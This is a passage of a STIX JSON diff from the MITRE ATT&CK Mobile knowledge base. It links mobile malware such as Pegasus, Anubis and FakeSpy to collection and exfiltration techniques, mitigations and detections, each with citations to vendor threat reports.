Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.982Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can get file lists on the SD card.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--45253350-c802-4566-a72d-57d43d05fd63", + "type": "relationship", + "created": "2020-05-07T15:24:49.530Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-05-27T13:23:34.536Z", + "description": "Security updates frequently contain patches to vulnerabilities.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6b64d3f4-96d6-48e5-a57e-b5cf897670f9", + "created": "2021-01-05T20:16:20.500Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:33.948Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect SMS messages from the device.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c50b4da7-f0e1-4f6d-969c-dbc739d49d7c", + "created": "2021-01-05T20:16:20.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:40:43.898Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect the device’s call logs.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bb006be2-7d2c-4bb3-ab48-7c95e0ab8106", + "type": "relationship", + "created": "2020-12-14T14:52:03.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T14:52:03.255Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has stored data embedded in the strings.xml resource file.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7af5be1-721f-40c5-b647-659243a0a14b", + "type": "relationship", + "created": "2020-04-08T15:41:19.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2021-09-20T13:50:02.057Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can record phone calls and audio.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b247a4f6-3629-4123-84b0-c7c5b3e7e37e", + "created": "2022-03-30T20:45:34.433Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Package Visibility", + "url": "https://developer.android.com/training/package-visibility", + "description": "Google. (n.d.). Package visibility filtering on Android. Retrieved April 11, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 11 introduced privacy enhancements to package visibility, filtering results that are returned from the package manager. 
iOS 12 removed the private API that could previously be used to list installed applications on non-app store applications.(Citation: Android Package Visibility)", + "modified": "2022-04-11T19:19:52.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50c81a85-8c70-48df-a338-8622d2debc74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:39.008Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather call logs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549", + "created": "2023-03-20T18:24:56.396Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:24:56.396Z", + 
"description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bde9304b-4421-4185-a2c6-dabe1c080587", + "created": "2023-03-16T18:31:48.708Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:31:48.708Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5f64f9e-3ed9-442b-a244-9857b926d93b", + "created": "2023-03-20T18:59:46.622Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:46.622Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 
"relationship--7baa3cab-c4f8-4b91-a6c3-189ad7a6416c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:34:08.372Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) gathers contacts from the system by dumping the victim's address book.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5e360913-4986-4423-8d3c-46d3202b7787", + "type": "relationship", + "created": "2019-09-04T14:28:15.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:51:37.979Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve the salt used when storing the user’s password, aiding an adversary in computing the user’s plaintext password/PIN from the stored password hash. [Monokle](https://attack.mitre.org/software/S0407) can also capture the user’s dictionary, user-defined shortcuts, and browser history, enabling profiling of the user and their activities.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--75989cf6-c023-4ed3-9d23-a83f55690186", + "created": "2023-02-28T21:43:36.886Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:36.886Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can read incoming text messages.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22708018-defd-4690-8b0f-fe47e11cb5d6", + "type": "relationship", + "created": "2020-07-15T20:20:59.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.316Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can capture all device notifications and hide notifications from the user.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--684c17bb-2075-4e1f-9fcb-17408511222d", + "type": "relationship", + "created": "2021-09-20T13:54:19.957Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-09-20T13:54:19.957Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can silently accept an incoming phone call.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a64b957-32fb-4dd6-84ae-48a2c74c560f", + "created": "2023-03-20T15:56:34.418Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:34.418Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--794c3cb4-1a1f-4d7e-969f-c97dfcd006c7", + "created": "2020-11-24T17:55:12.889Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . 
Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:22:27.554Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can request device administrator permissions.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee92911e-e2a2-4b40-916d-ce01b6e897f9", + "created": "2020-09-15T15:18:12.419Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. 
Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:18.859Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect the device’s contact list.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a451966b-f826-422b-9505-f564b9988a9c", + "created": "2020-12-24T21:55:56.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:27:39.012Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used both FTP and TCP sockets for data exfiltration.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e457921c-4a0b-4d6e-92e7-553929ddf943", + "created": "2023-02-06T18:51:14.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:48.120Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can download and install additional malware after initial infection.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55", + "created": "2023-03-03T16:23:56.031Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:23:56.031Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected the device UUID.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d2749285-47d9-44a4-962f-9215e6fb580e", + "created": "2020-10-29T17:48:27.380Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:30.569Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can access the device’s contact list.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97738857-d496-4d39-9809-1921e0ad10b7", + "type": "relationship", + "created": "2020-12-31T18:25:05.125Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "modified": "2020-12-31T18:25:05.125Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can collect files from the filesystem and account information from Google Chrome.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--13aba849-5004-4457-9f3b-49e470b589e0", + "created": "2023-03-20T18:43:44.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:44.617Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51457698-e98b-435a-88c2-75a82cdc2bda", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:56.380Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads call logs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--209aa948-393c-46b0-9488-ef93a6252438", + "created": "2022-03-30T20:07:19.296Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:07:19.296Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93b6bf37-5614-4317-8ed7-42f098152c40", + "created": "2023-02-28T20:39:18.320Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
